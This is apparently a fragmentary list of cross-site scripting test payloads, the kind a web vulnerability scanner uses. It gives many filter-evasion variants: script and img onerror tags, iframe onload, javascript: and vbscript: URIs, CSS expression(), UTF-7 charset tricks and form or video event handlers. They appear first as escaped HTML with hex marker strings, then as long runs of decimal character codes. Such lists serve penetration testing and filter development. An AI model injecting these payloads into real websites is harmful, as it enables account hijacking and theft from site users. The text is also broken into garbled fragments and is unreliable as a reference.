8,52,57,51,101,49,99,55,102,102,97,48,99,52,51,52,49,50,97,48,102,34,62,60,115,111,117,114,9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"&gt;da92636f5e6f8c824a7a84c7c7a3fe6d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53e3d0d24efc91870fe4e4b92333e813')&lt;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"&gt;&lt;script&gt;alert('53e3d0d24efc91870fe4e4b92333e813'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'';!--"&lt;bedf1a90e5af7c4c6acbe58c04814a55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&lt;/title&gt;dc744d75ed889b672d1adda633a5e62a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"&gt;&lt;imgsrc="x:x"onerror="f9d84d23ce0e0fbf0317b1de1fdf12d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&lt;bodyonload!#$%&amp;()*~+-_.,:;?@[/|\\]^`=021a0cf5350375de1ac2431d9099a2a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'';!--"&lt;235cae32fce47d1619383918941dddc6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&lt;imgsrc="2fbd1a4a0e31efbbc80338b776b0e2e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&lt;imgsrc=220f02d2cffece66266ef563d74371c4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&lt;imgsrc=`59d51fd6ac5a6390a169c239a4d2b102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&lt;img"""&gt;a6b22dafd27cb94e7fd1eb38b5702be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&lt;divstyle="behaviour:url(5c7b81cea47db9b1b6fa9ba7b672be93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130ff451c27feedb1cd2fdc675f6fc42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&lt;&lt;script&gt;130ff451c27feedb1cd2fdc675f6fc42/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aaaf97f0f624c12beb3882594399b922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";aaaf97f0f624c12beb3882594399b922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&lt;imgsrc='33ae635fc9da5ec11d9b9ce7e24b3439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&lt;bodybackground="d6b6a9b949ac11fae084b42c13a84d1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&lt;inputtype="image"src="27876c94e60fadf7cc78216e410165b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&lt;bodyonload=c1194111cac66a9ac318c9b8a155b748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&lt;imgdynsrc="3d973278b42c8109df8679966578c22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&lt;imglowsrc="1cd7c31e3b9942466f253b023b3c000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&lt;bgsoundsrc="5e52092dfbd29886792e03c59475301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&lt;brsize="&amp;{5914a014b453c76172ef03844e873503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&lt;linkrel="stylesheet"href="da200f28b9e04cb25252729da9ef311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&lt;imgsrc='vbscript:16a4656e02f29a7f942e35fbf998d789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&lt;imgsrc="mocha:[2fed34c0d5ea2f33321d58572b7a13c6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&lt;imgsrc="livescript:[bb05e9f1cc751919989babe68bae2650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&lt;metahttp-equiv="refresh"content="0;url=70246f4c121fe3e7fb1832cbd34dab0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&lt;tablebackground="83713bebdd1bf92276c9ef4ee8e9045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&lt;tablebackground=javascript:7b1130e835137cc8a85030d57db5706f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&lt;table&gt;&lt;tdbackground="aea255825bc21d11718e0e91bb62c5d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&lt;divstyle="background-image:url(af454ef328fc707c51ddab50ab29b310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&lt;divstyle="width:expression(7b281158c95a7ac8d19e86971b506acc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5c3fd09b17c08490e85ab8e9c3a9e92f"&gt;&lt;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&lt;iframesrc="5c3fd09b17c08490e85ab8e9c3a9e92f"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&lt;iframe//onload=8512b6595e3111a939d6849f060af9be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&lt;iframe/"onload=6a68d2e8459967027b03f781859c04ea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&lt;iframe///////onload=be607b7c0f98b7b67456e5b1601bb576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96d7a64a69314dcebc1f3ac2aea7391a&gt;&lt;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&lt;iframe"onload=96d7a64a69314dcebc1f3ac2aea7391a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&lt;iframe/"onload=70a7bf84c14af67db961c0392ed318fa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bb86ca4c681b65b4e7576e7ce7b09ef9&gt;&lt;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&lt;iframe&lt;?phpechochr(11)?&gt;onload=bb86ca4c681b65b4e7576e7ce7b09ef9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e3db4dcd8796dd4ce3a0bd0a2b6b46b1&gt;&lt;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&lt;iframe&lt;?phpechochr(12)?&gt;onload=e3db4dcd8796dd4ce3a0bd0a2b6b46b1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a743ac8e4c45dfe7a6b020b8a56487ef"&gt;&lt;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&lt;frameset&gt;&lt;framesrc="a743ac8e4c45dfe7a6b020b8a56487ef"&gt;&lt;/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&lt;tablebackground="bd90fd439f0bf7fcacbb4443d3ed74d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&lt;table&gt;&lt;tdbackground="dbb2b7f773cbde12885b3e1d1ce2c74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&lt;divstyle="background-image:url(&amp;#1;226baad90fc1a9067e9f0a0581b11309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&lt;divstyle="width:expression(8815a35aa4983f4f9d65660040333cdd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&lt;imgstyle="xss:expr/*bc38ae0cfd90eb574cc8053bb15a7de9*/ession(bc38ae0cfd90eb574cc8053bb15a7de9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&lt;191a4e1c765acbfaebaf0f24ce9438b9style="xss:expression(191a4e1c765acbfaebaf0f24ce9438b9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&lt;styletype="text/javascript"&gt;c0b02ac466ee1118dc8abf59a6de8a12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dc58fb9b378b04b9fbb2ca3db06846b7{background-image:url("dc58fb9b378b04b9fbb2ca3db06846b7");}&lt;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&lt;style&gt;.dc58fb9b378b04b9fbb2ca3db06846b7{background-image:url("dc58fb9b378b04b9fbb2ca3db06846b7");}&lt;/style&gt;&lt;aclass=dc58fb9b378b04b9fbb2ca3db06846b7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&lt;styletype="text/css"&gt;body{background:url("60a1943e302e98992c6bfbacff166f97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&lt;!--[ifgteie4]&gt;742e869707a3a908675ea1cc1614b23e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6fd38b38f713d61b4a069ad873978a54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&lt;basehref="6fd38b38f713d61b4a069ad873978a54/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e10eb6e4198a4493b132dae3dab4d745&gt;&lt;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&lt;objectclassid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;paramname=urlvalue=e10eb6e4198a4493b132dae3dab4d745&gt;&lt;/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a="get";b="url("";c="javascript:";d="9b2774730519410cfdd5000630a85b96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c64d2c8f70a0594400e932728ac61843&lt;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&lt;?echo('&lt;scr)';echo('ipt&gt;c64d2c8f70a0594400e932728ac61843&lt;/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c734a5b2625a13c3c2ea6e6df8f4e007&amp;lt;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&lt;metahttp-equiv="set-cookie"content="userid=&amp;lt;script&amp;gt;c734a5b2625a13c3c2ea6e6df8f4e007&amp;lt;/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&lt;scriptsrc=http://127.0.0.1&gt;fe5d185c0cd939f5b213746b8e21ef3c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&lt;imgsrc="&amp;14;javascript:976d509676b6e26da4eb077085a5f28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&lt;imgsrc="jav&amp;#x0d;ascript:7af8730788e66062405b425974b0330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---&lt;imgsrc="&amp;#14;d0c20e6d6c84ce0322ffc43cac6727e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---&lt;imgsrc="1f56ec5c84a7b4e16a43239547d9cb51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&lt;script&gt;a=/2dc2d784e58411ea737649f8d248acb6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edbc4cd42b087eceae5d6c8eb599e77f;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---";edbc4cd42b087eceae5d6c8eb599e77f;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&lt;metahttp-equivo"refresh"content="0;url=http://;url=28f86d09bddb1612bb2181eaabc3411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011ab303bc55c94ef71bdd6db82f0e59"&gt;&lt;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&lt;script&lt;b&gt;=011ab303bc55c94ef71bdd6db82f0e59"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&lt;iframesrc="javascript:cb0493e87fb6a3b9a561bc23f10170e4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&lt;script&gt;a=/fe33bba8f016cef5d0d66d92c0122040/nfe33bba8f016cef5d0d66d92c0122040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44b53b70d45eaa49fc2f1ec38befd279&gt;&lt;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&lt;layersrc="javascript:44b53b70d45eaa49fc2f1ec38befd279&gt;&lt;/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1bab04cdd455523f07d841770316364f&lt;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&lt;style&gt;li{list-style-image:url("1bab04cdd455523f07d841770316364f&lt;/style&gt;&lt;ul&gt;&lt;li&gt;1bab04cdd455523f07d841770316364f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&lt;divstyle="background-image:url(&amp;#1;javascript:33a8b3f8c3ea6516672fc939345fda8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&lt;head&gt;&lt;metahttp-equiv="content-type"content="text/html;charset=utf-7"&gt;&lt;/head&gt;+adw-script+ad4-aa6ee5abc09a89d21e92ba41a151f3cf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&lt;ahref="javascript#b1ce2051b35216d7bf5ba242ed95c83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&lt;inputtype="image"dynsrc="36a1101474d030cf52240c3a5b36cb1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&amp;01e9ba79d90b5d3d1500b6be68eb6d8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&amp;{ab0b4ea6c66662b99412fae9fd405aab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&lt;imgsrc=&amp;{1e3e9a5418afb821aa30630b2903007f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&lt;ahref="about:7266d848795ec61e9a11aae1e563700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&lt;divstyle="binding:url(javascript:5cfbd8420ef092339639cf5c6aa1cbeb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&lt;objectclassid=clsid:..."codebase="javascript:f23b873c4ac106bcf2c164c6ba8c040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&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;e0bc299c9fcc337ef99105a0812bb0ba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&lt;!------&gt;d7981d89fe498815a09c3b6368257fdf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c3a1b51e5023d52eea666c5e615af4eb;&lt;b&gt;&lt;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&lt;xmlid="x"&gt;&lt;a&gt;&lt;b&gt;c3a1b51e5023d52eea666c5e615af4eb;&lt;b&gt;&lt;/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e29c4c6698325f8943c3e1e8741ef5cf"&gt;&lt;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&lt;divdatafld="b"dataformatas="html"datasrc="#e29c4c6698325f8943c3e1e8741ef5cf"&gt;&lt;/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f36532054f5a6b2b244c3422ac618d9c"&gt;]]&lt;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&lt;xmlid=i&gt;&lt;x&gt;&lt;c&gt;&lt;![cdata[&lt;imgsrc="javas]]&lt;![cdata[cript:f36532054f5a6b2b244c3422ac618d9c"&gt;]]&lt;/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&lt;formid="test"/&gt;&lt;buttonform="test"formaction="javascript:05ce652850f58afd7d6f8ace4f56ccd5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&lt;inputonfocus=javascript:adbc57b33bcffa68f0241ffe9a90a1ff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&lt;selectonfocus=javascript:7d5752236d3105a743bf15d2bd52a3e2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&lt;textareaonfocus=javascript:1c9721d7b03100de6e65ebb942aade32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&lt;keygenonfocus=javascript:ef1e0d9792f2012ea8a2ec0a181b283a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&lt;inputonblur=javascript:8c8612cb530dd7ebd7c2dc9ee96e3936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b3029a0377ab57271c07c89ca134f271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&lt;videoposter=javascript:b3029a0377ab57271c07c89ca134f271/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&lt;bodyonscroll=d937f3f6359899d69f8a0f09e9c0dd82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x&lt;formid=test&gt;&lt;input&gt;&lt;/form&gt;&lt;buttonform=testonformchange==javascript:9bb1c7c3f1bf021f2dfd766e8c08a589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&lt;video&gt;&lt;sourceonerror="javascript:fb4c13337bc4c99cb78611fb29cf35a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&lt;videoonerror="javascript:7807b6702ed6ef78f52515b7609a3ded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50,54,56,49,100,97,98,48,57,49,52,97,51,100,98,52,100,56,56,48,56,57,52,51,50,101,48,99,54,102,49,5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83,67,82,73,80,84,62,97,108,101,114,116,40,39,53,57,99,56,51,102,54,52,102,55,101,99,101,53,53,102,54,98,101,101,102,51,99,54,52,49,51,52,48,57,101,57,39,4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49,49,55,99,56,101,50,99,48,52,52,98,52,97,102,48,55,97,97,98,51,98,56,54,97,100,102,48,55,51,49,52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47,84,73,84,76,69,62,56,56,102,97,102,54,56,101,100,55,97,49,54,99,102,49,102,51,54,57,51,49,49,50,52,54,102,101,48,48,98,5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105,109,103,32,115,114,99,61,34,120,58,120,34,32,111,110,101,114,114,111,114,61,34,49,54,99,57,101,49,50,98,100,56,48,56,48,55,101,50,56,56,50,99,57,52,57,56,53,56,102,102,100,100,48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111,110,108,111,97,100,33,35,36,37,38,40,41,42,126,43,45,95,46,44,58,59,63,64,91,47,124,92,93,94,96,61,99,57,50,97,49,54,57,98,49,54,56,54,102,53,53,102,50,50,54,100,56,55,99,54,50,51,102,97,49,100,49,10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100,54,97,102,101,50,49,100,48,49,56,101,99,55,57,101,49,56,55,98,101,98,53,55,97,49,48,56,102,57,99,50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55,101,98,52,48,51,101,50,53,48,52,55,55,53,50,57,99,56,56,50,51,56,56,56,52,57,100,57,97,54,50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53,50,99,102,99,52,57,51,57,51,97,55,100,99,102,98,48,50,50,50,49,100,56,98,50,54,52,48,100,48,98,9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96,102,48,55,56,53,102,102,102,53,55,57,101,57,52,55,97,54,98,100,57,100,56,100,102,50,98,56,48,50,102,54,101,96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34,34,34,62,51,49,49,48,102,48,51,49,48,48,100,50,54,49,98,51,53,99,98,101,97,99,49,55,97,56,97,97,50,53,53,9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2,38,35,49,52,59,32,32,56,102,97,100,101,101,48,101,56,51,102,50,100,98,102,51,51,57,55,98,50,52,101,49,50,56,102,99,100,57,53,4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1,104,97,118,105,111,117,114,58,32,117,114,108,40,99,99,52,100,48,51,98,99,101,57,57,100,98,55,55,100,49,99,49,56,57,56,56,50,100,99,101,53,102,102,102,100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0,83,67,82,73,80,84,62,56,101,97,55,56,100,51,53,51,100,52,100,100,52,102,52,56,49,51,101,51,55,102,56,99,101,51,51,55,57,50,48,47,47,60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59,56,57,48,48,50,100,49,51,101,54,101,54,57,99,52,56,98,57,101,49,50,57,50,49,98,49,98,52,52,55,51,102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56,54,100,51,98,97,102,97,49,53,99,52,56,99,55,51,55,48,56,50,53,50,101,52,97,48,56,53,100,97,101,57,3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66,65,67,75,71,82,79,85,78,68,61,34,54,102,100,102,50,53,102,56,54,51,97,101,50,101,55,101,100,57,49,99,98,51,102,55,97,54,98,98,54,98,100,5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8,80,85,84,32,84,89,80,69,61,34,73,77,65,71,69,34,32,83,82,67,61,34,49,98,53,102,53,53,48,98,51,53,48,97,100,48,101,98,53,56,51,102,52,100,57,57,54,51,99,100,51,53,98,5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79,78,76,79,65,68,61,102,50,55,102,100,54,101,52,48,101,56,52,100,51,49,56,49,57,53,56,102,51,55,98,50,102,102,55,99,49,99,100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68,89,78,83,82,67,61,34,56,54,50,50,49,51,100,52,57,57,57,53,100,53,54,50,54,56,56,56,50,55,101,56,99,101,50,49,100,53,54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76,79,87,83,82,67,61,34,57,98,97,102,50,53,102,102,100,100,101,99,48,102,49,55,56,102,101,52,52,53,56,57,53,98,48,97,51,98,53,4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1,83,79,85,78,68,32,83,82,67,61,34,97,51,56,98,57,101,101,56,48,55,48,54,55,50,102,101,97,49,49,53,97,53,98,57,98,99,97,101,48,50,100,10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82,32,83,73,90,69,61,34,38,123,50,52,100,48,52,100,99,55,57,97,52,50,98,52,99,100,55,98,100,52,49,98,53,51,101,51,51,50,102,56,54,98,12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73,78,75,32,82,69,76,61,34,115,116,121,108,101,115,104,101,101,116,34,32,72,82,69,70,61,34,49,49,53,52,48,98,102,99,54,101,99,53,52,49,57,98,49,52,101,54,99,102,52,56,55,102,53,49,97,100,99,5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118,98,115,99,114,105,112,116,58,99,51,100,55,57,57,51,102,101,97,55,49,99,99,57,56,54,49,57,56,53,100,49,54,52,102,50,56,56,49,102,53,3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9,111,99,104,97,58,91,56,53,56,53,102,97,49,49,52,50,53,54,52,98,97,97,102,48,100,50,101,99,51,55,55,48,49,98,54,101,101,50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8,105,118,101,115,99,114,105,112,116,58,91,48,101,101,50,49,55,50,49,53,49,51,57,52,97,100,55,56,54,54,52,53,51,50,102,52,98,99,55,53,101,98,51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114,101,102,114,101,115,104,34,32,67,79,78,84,69,78,84,61,34,48,59,117,114,108,61,100,98,98,54,98,56,54,48,55,55,51,100,52,101,49,51,53,53,101,57,51,53,50,55,101,102,55,49,100,100,53,10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97,51,54,57,54,98,52,57,50,101,52,98,102,55,101,102,102,98,56,53,51,49,49,48,102,48,98,55,99,50,100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106,97,118,97,115,99,114,105,112,116,58,98,100,53,48,49,57,57,56,49,57,100,97,99,100,54,51,57,50,49,53,97,55,97,100,98,97,52,57,102,50,53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56,102,99,54,56,102,99,99,49,56,98,101,51,98,100,100,51,55,97,101,97,54,98,101,99,101,50,48,54,52,98,5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55,48,48,50,56,52,48,101,48,54,57,101,49,50,98,98,53,98,102,55,52,50,55,56,98,99,101,56,97,52,56,98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97,52,49,49,53,57,50,54,57,48,51,97,98,50,55,101,99,101,50,97,53,51,48,48,98,55,53,99,54,102,100,101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0,82,65,77,69,32,83,82,67,61,34,52,54,48,102,53,57,49,50,97,48,101,49,99,102,53,53,48,54,102,49,97,57,101,99,51,98,99,99,48,51,101,48,34,62,60,47,73,70,82,65,77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47,111,110,108,111,97,100,61,51,48,54,101,102,57,53,53,53,101,54,49,100,102,51,98,56,52,48,99,54,53,97,54,48,57,54,48,49,56,54,53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34,111,110,108,111,97,100,61,48,98,55,56,99,50,98,101,55,49,101,97,49,53,98,50,102,101,99,97,51,56,56,99,97,50,99,49,50,48,54,51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47,47,47,47,47,47,111,110,108,111,97,100,61,49,99,101,97,101,53,54,97,56,51,52,99,99,56,57,51,49,97,52,57,101,52,56,101,102,101,49,52,98,101,98,102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32,34,111,110,108,111,97,100,61,97,54,51,49,56,98,51,101,101,54,100,50,55,97,54,101,54,50,53,53,98,57,52,101,49,48,55,97,52,102,99,50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34,111,110,108,111,97,100,61,56,52,52,100,101,102,51,97,48,97,100,100,57,97,100,99,51,102,57,98,97,56,55,50,102,100,53,101,57,54,98,99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49,41,63,62,32,111,110,108,111,97,100,61,52,97,49,53,51,50,102,48,57,55,100,50,53,97,101,54,51,48,55,97,97,53,51,99,57,51,54,101,54,51,50,55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50,41,63,62,32,111,110,108,111,97,100,61,48,53,56,49,99,55,98,102,100,101,102,51,101,57,48,97,50,51,98,51,49,56,98,50,97,97,99,48,48,55,48,97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0,82,65,77,69,83,69,84,62,60,70,82,65,77,69,32,83,82,67,61,34,53,101,51,57,48,100,53,98,100,52,56,101,55,101,101,54,53,54,49,98,48,97,97,55,57,48,55,56,48,55,99,56,34,62,60,47,70,82,65,77,69,83,69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101,50,101,97,52,52,100,50,98,55,57,97,101,98,53,49,50,101,101,50,56,57,51,97,100,51,97,101,54,49,51,5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52,55,48,100,48,49,52,100,57,54,49,101,50,49,49,54,98,50,53,98,50,97,55,51,97,53,100,98,57,57,49,4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99,56,100,98,102,51,54,101,51,102,98,54,49,102,54,98,52,99,50,56,98,53,56,99,51,55,99,102,98,100,100,100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52,51,102,53,49,98,102,99,98,54,101,99,52,55,102,102,48,52,99,55,98,52,54,101,57,102,100,99,98,99,57,50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4,89,76,69,61,34,120,115,115,58,101,120,112,114,47,42,50,56,57,48,49,102,98,56,49,51,54,100,98,98,101,100,54,50,55,57,48,51,56,48,53,53,101,51,57,98,102,100,42,47,101,115,115,105,111,110,40,50,56,57,48,49,102,98,56,49,51,54,100,98,98,101,100,54,50,55,57,48,51,56,48,53,53,101,51,57,98,102,100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56,100,99,102,97,97,53,99,102,97,99,50,48,57,99,97,99,57,100,53,55,54,97,49,50,49,50,102,57,54,50,57,32,83,84,89,76,69,61,34,120,115,115,58,101,120,112,114,101,115,115,105,111,110,40,56,100,99,102,97,97,53,99,102,97,99,50,48,57,99,97,99,57,100,53,55,54,97,49,50,49,50,102,57,54,50,57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84,89,80,69,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,102,56,50,57,102,102,54,54,97,101,54,97,51,52,100,57,55,52,99,99,54,98,49,97,55,55,55,101,54,56,53,99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46,50,97,55,54,57,102,97,102,56,97,102,102,100,52,102,56,99,97,48,48,49,49,52,52,49,100,98,102,55,98,48,50,123,98,97,99,107,103,114,111,117,110,100,45,105,109,97,103,101,58,117,114,108,40,34,50,97,55,54,57,102,97,102,56,97,102,102,100,52,102,56,99,97,48,48,49,49,52,52,49,100,98,102,55,98,48,50,34,41,59,125,60,47,83,84,89,76,69,62,60,65,32,67,76,65,83,83,61,50,97,55,54,57,102,97,102,56,97,102,102,100,52,102,56,99,97,48,48,49,49,52,52,49,100,98,102,55,98,48,50,62,60,47,6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116,121,112,101,61,34,116,101,120,116,47,99,115,115,34,62,66,79,68,89,123,98,97,99,107,103,114,111,117,110,100,58,117,114,108,40,34,49,50,98,52,55,49,100,54,49,56,100,102,98,53,50,51,97,57,48,54,57,99,52,100,50,50,98,97,53,51,57,54,34,41,125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91,105,102,32,103,116,101,32,73,69,32,52,93,62,56,48,102,50,100,100,100,102,49,102,55,102,102,49,100,100,48,50,52,97,97,51,101,52,57,49,48,52,98,97,48,52,60,33,91,101,110,100,105,102,93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65,83,69,32,72,82,69,70,61,34,54,102,51,54,50,53,53,52,50,99,51,52,50,48,53,56,51,53,48,51,98,98,99,97,55,99,50,55,54,97,102,101,47,4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97,101,50,52,102,100,97,101,45,48,51,99,54,45,49,49,100,49,45,56,98,55,54,45,48,48,56,48,99,55,52,52,102,51,56,57,62,60,112,97,114,97,109,32,110,97,109,101,61,117,114,108,32,118,97,108,117,101,61,100,54,99,53,102,101,97,102,100,102,52,99,98,100,49,56,53,101,56,57,52,101,48,57,49,100,51,57,54,102,57,99,62,60,47,79,66,74,69,67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97,61,34,103,101,116,34,59,98,61,34,85,82,76,40,34,34,59,99,61,34,106,97,118,97,115,99,114,105,112,116,58,34,59,100,61,34,97,52,53,99,52,97,102,51,56,99,48,57,57,56,52,97,100,51,52,101,48,54,50,55,51,57,51,48,49,51,53,97,34,41,34,59,101,118,97,108,40,97,43,98,43,99,43,100,41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3,32,101,99,104,111,40,39,60,83,67,82,41,39,59,101,99,104,111,40,39,73,80,84,62,48,99,98,57,102,98,56,48,54,55,55,98,98,50,51,55,102,48,97,99,48,51,53,51,100,102,98,101,102,51,98,100,60,47,83,67,82,73,80,84,62,39,41,59,32,63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83,101,116,45,67,111,111,107,105,101,34,32,67,111,110,116,101,110,116,61,34,85,83,69,82,73,68,61,38,108,116,59,83,67,82,73,80,84,38,103,116,59,51,53,52,57,100,99,100,49,102,97,101,100,101,98,102,101,100,49,55,101,97,48,51,49,49,53,100,51,50,57,50,51,38,108,116,59,47,83,67,82,73,80,84,38,103,116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83,82,67,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,62,50,102,51,48,56,56,55,51,48,97,49,102,101,50,53,52,49,99,54,54,49,48,48,52,56,50,97,57,53,56,50,55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8,49,52,59,106,97,118,97,115,99,114,105,112,116,58,54,55,101,55,101,50,101,102,100,52,51,49,53,51,102,50,97,49,52,54,100,57,101,50,49,100,57,56,99,53,49,4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6,97,118,38,35,120,48,68,59,97,115,99,114,105,112,116,58,98,100,100,100,97,50,53,53,52,100,48,54,102,99,101,55,100,49,99,101,98,97,48,57,55,102,102,50,100,100,52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32,38,35,49,52,59,32,32,101,101,57,49,53,49,52,48,98,97,100,100,55,50,98,97,51,98,100,57,48,99,98,99,55,101,48,97,102,50,52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97,98,48,51,100,52,55,53,50,57,99,55,51,97,55,99,48,55,102,101,101,55,99,55,98,54,51,54,57,99,55,5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62,97,61,47,52,99,49,54,48,57,48,97,51,57,97,51,52,99,100,100,54,54,56,98,56,100,49,55,55,100,49,97,102,53,55,97,47,97,108,101,114,116,40,97,46,115,111,117,114,99,101,4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34,59,57,57,97,54,51,53,54,52,48,102,99,99,101,55,50,98,50,52,57,97,54,101,50,102,57,56,102,49,55,52,97,52,59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111,34,114,101,102,114,101,115,104,34,32,67,79,78,84,69,78,84,61,34,48,59,32,85,82,76,61,104,116,116,112,58,47,47,59,85,82,76,61,102,98,56,57,97,53,53,56,101,57,57,48,51,99,48,97,49,51,49,98,49,48,55,51,97,102,53,50,49,101,97,10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60,66,62,61,51,55,55,100,57,53,49,56,98,57,98,51,98,50,55,100,97,100,50,99,57,52,97,50,100,48,55,52,102,102,54,98,34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0,82,65,77,69,32,83,82,67,61,34,106,97,118,97,115,99,114,105,112,116,58,49,49,53,102,56,50,50,55,55,56,56,57,53,56,100,50,101,101,102,100,56,49,97,102,97,98,97,101,57,50,50,52,32,6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62,97,61,47,48,97,99,54,54,52,101,54,100,49,56,50,56,52,55,97,101,54,54,55,102,52,48,57,52,49,98,101,98,98,98,54,47,110,48,97,99,54,54,52,101,54,100,49,56,50,56,52,55,97,101,54,54,55,102,52,48,57,52,49,98,101,98,98,98,54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65,89,69,82,32,83,82,67,61,34,106,97,118,97,115,99,114,105,112,116,58,102,51,50,99,48,99,53,100,99,100,54,52,99,101,99,49,52,56,56,53,48,56,50,56,54,48,102,97,56,54,52,49,62,60,47,76,65,89,69,8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108,105,32,123,108,105,115,116,45,115,116,121,108,101,45,105,109,97,103,101,58,32,117,114,108,40,34,52,52,48,50,54,98,50,48,56,52,52,50,100,52,51,56,55,102,49,51,98,54,55,49,50,51,100,51,56,50,100,48,60,47,83,84,89,76,69,62,60,85,76,62,60,76,73,62,52,52,48,50,54,98,50,48,56,52,52,50,100,52,51,56,55,102,49,51,98,54,55,49,50,51,100,51,56,50,100,4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106,97,118,97,115,99,114,105,112,116,58,98,98,98,50,102,55,49,55,49,100,100,55,52,54,54,48,102,55,56,53,101,52,99,52,53,50,49,56,102,99,52,9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102,99,50,100,49,99,52,48,100,49,55,99,101,50,56,102,99,48,54,53,98,53,56,48,101,99,100,100,101,54,101,98,43,65,68,119,45,47,83,67,82,73,80,84,43,65,68,52,4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106,97,118,97,115,99,114,105,112,116,35,102,102,48,51,53,55,56,52,50,55,54,102,56,57,57,101,56,54,53,97,57,100,52,53,98,49,49,101,50,99,98,5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6,121,112,101,61,34,105,109,97,103,101,34,32,100,121,110,115,114,99,61,34,55,54,102,101,54,49,97,55,49,102,56,102,55,98,48,101,49,52,101,50,51,57,50,101,99,100,50,101,102,102,52,5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51,53,51,51,53,53,55,50,57,98,101,98,51,48,100,101,48,99,54,98,101,50,100,99,52,57,98,102,49,102,101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123,51,102,100,55,53,101,48,55,48,48,101,99,98,100,52,97,49,53,57,98,52,49,55,52,99,54,57,100,52,52,52,97,125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8,123,102,49,52,100,97,50,101,99,49,98,102,49,100,100,97,57,53,52,49,101,52,50,51,51,100,51,55,98,101,99,98,51,125,5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97,98,111,117,116,58,99,57,52,100,48,52,97,97,99,97,101,51,101,99,50,48,50,48,56,52,100,51,98,98,54,101,102,56,56,100,57,10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5,110,100,105,110,103,58,32,117,114,108,40,106,97,118,97,115,99,114,105,112,116,58,52,99,101,55,100,56,99,50,102,102,57,48,53,101,57,52,52,57,53,100,98,55,98,50,57,97,49,97,97,49,53,56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46,46,46,34,32,99,111,100,101,98,97,115,101,61,34,106,97,118,97,115,99,114,105,112,116,58,101,98,54,48,97,51,57,57,56,55,48,49,53,49,48,99,54,98,100,101,99,56,101,51,102,100,50,57,48,102,98,48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16,121,108,101,62,60,33,45,45,60,47,115,116,121,108,101,62,60,83,67,82,73,80,84,62,97,52,57,100,55,99,97,48,55,102,51,56,97,52,50,100,49,49,54,50,100,48,51,54,97,54,101,49,50,102,56,102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3,91,67,68,65,84,65,91,60,33,45,45,93,93,60,83,67,82,73,80,84,62,99,98,97,56,101,100,53,56,98,56,52,48,98,99,50,57,53,54,97,56,98,53,54,55,100,99,102,54,97,99,48,102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32,45,45,32,45,45,62,56,101,53,48,55,54,56,99,53,55,51,100,48,57,56,101,49,51,100,100,49,54,51,57,54,48,50,98,56,51,101,102,60,33,45,45,32,45,45,32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20,109,108,32,105,100,61,34,88,34,62,60,97,62,60,98,62,98,101,97,100,52,48,49,97,56,57,49,101,53,48,98,56,52,56,50,54,55,52,100,99,53,98,51,48,55,55,55,98,59,60,98,62,60,47,97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0,105,118,32,100,97,116,97,102,108,100,61,34,98,34,32,100,97,116,97,102,111,114,109,97,116,97,115,61,34,104,116,109,108,34,32,100,97,116,97,115,114,99,61,34,35,102,100,53,55,55,97,97,102,98,48,54,102,51,53,48,48,49,99,97,50,98,99,101,51,48,56,100,48,50,50,101,56,34,62,60,47,100,105,11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8,77,76,32,73,68,61,73,62,60,88,62,60,67,62,60,33,91,67,68,65,84,65,91,60,73,77,71,32,83,82,67,61,34,106,97,118,97,115,93,93,60,33,91,67,68,65,84,65,91,99,114,105,112,116,58,54,97,100,54,53,51,100,52,48,98,55,50,55,102,99,50,54,99,50,102,99,100,56,48,97,54,102,48,54,57,53,101,34,62,93,93,60,47,67,62,60,88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2,111,114,109,32,105,100,61,34,116,101,115,116,34,32,47,62,60,98,117,116,116,111,110,32,102,111,114,109,61,34,116,101,115,116,34,32,102,111,114,109,97,99,116,105,111,110,61,34,106,97,118,97,115,99,114,105,112,116,58,57,101,48,99,55,52,50,102,51,56,102,57,97,98,99,101,48,52,54,55,48,100,56,97,101,56,99,99,56,52,49,48,34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102,111,99,117,115,61,106,97,118,97,115,99,114,105,112,116,58,97,102,51,50,57,100,102,53,49,55,52,101,57,101,97,56,57,48,101,97,50,99,101,101,51,51,51,52,48,97,99,57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01,108,101,99,116,32,111,110,102,111,99,117,115,61,106,97,118,97,115,99,114,105,112,116,58,53,99,54,48,100,56,102,101,56,49,101,50,100,54,99,50,50,55,50,52,100,49,57,99,101,51,55,50,99,56,57,97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6,101,120,116,97,114,101,97,32,111,110,102,111,99,117,115,61,106,97,118,97,115,99,114,105,112,116,58,102,102,97,51,98,57,100,101,53,53,51,50,98,100,51,50,48,50,56,49,53,49,50,56,97,57,55,98,53,57,57,101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7,101,121,103,101,110,32,111,110,102,111,99,117,115,61,106,97,118,97,115,99,114,105,112,116,58,50,99,53,57,97,50,57,51,55,48,98,57,101,48,98,102,101,54,101,56,51,99,99,97,56,55,54,55,101,55,100,5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98,108,117,114,61,106,97,118,97,115,99,114,105,112,116,58,99,52,99,98,100,101,101,55,97,49,55,50,99,51,50,48,97,56,53,101,50,52,56,102,50,53,100,49,49,100,50,54,32,97,117,116,111,102,111,99,117,115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2,111,115,116,101,114,61,106,97,118,97,115,99,114,105,112,116,58,54,51,97,55,100,49,55,99,55,48,51,100,52,102,97,98,54,99,51,57,99,54,98,54,54,49,48,54,51,54,56,100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8,111,100,121,32,111,110,115,99,114,111,108,108,61,49,55,48,54,50,99,100,55,54,57,101,54,99,101,102,51,99,57,54,98,52,99,50,54,98,57,48,97,55,97,55,97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32,111,110,102,111,114,109,105,110,112,117,116,61,106,97,118,97,115,99,114,105,112,116,58,101,50,54,52,50,55,54,102,102,53,97,50,101,100,54,99,55,101,98,100,99,102,99,49,99,53,53,50,53,55,50,97,62,60,105,110,112,117,116,62,60,47,102,111,114,10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62,60,105,110,112,117,116,62,60,47,102,111,114,109,62,60,98,117,116,116,111,110,32,102,111,114,109,61,116,101,115,116,32,111,110,102,111,114,109,99,104,97,110,103,101,61,61,106,97,118,97,115,99,114,105,112,116,58,100,50,48,56,102,101,53,101,57,102,49,102,49,102,52,100,52,52,98,99,97,100,101,57,50,57,49,51,52,48,97,99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62,60,115,111,117,114,99,101,32,111,110,101,114,114,111,114,61,34,106,97,118,97,115,99,114,105,112,116,58,98,55,53,48,100,101,55,101,99,53,55,50,51,99,57,51,56,97,102,102,102,98,57,53,97,49,97,102,97,55,99,10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1,110,101,114,114,111,114,61,34,106,97,118,97,115,99,114,105,112,116,58,55,52,48,50,102,54,50,50,52,49,53,51,49,53,53,54,51,55,54,48,51,48,49,51,100,48,98,100,55,48,102,98,34,62,60,115,111,117,114,9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52935499e2778becd812b29e44c6eb6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28adb5ba6edb0e04eda5a1d3fcf941b7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eaea2a74705d808c1f5c095840ee6fc4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df64ee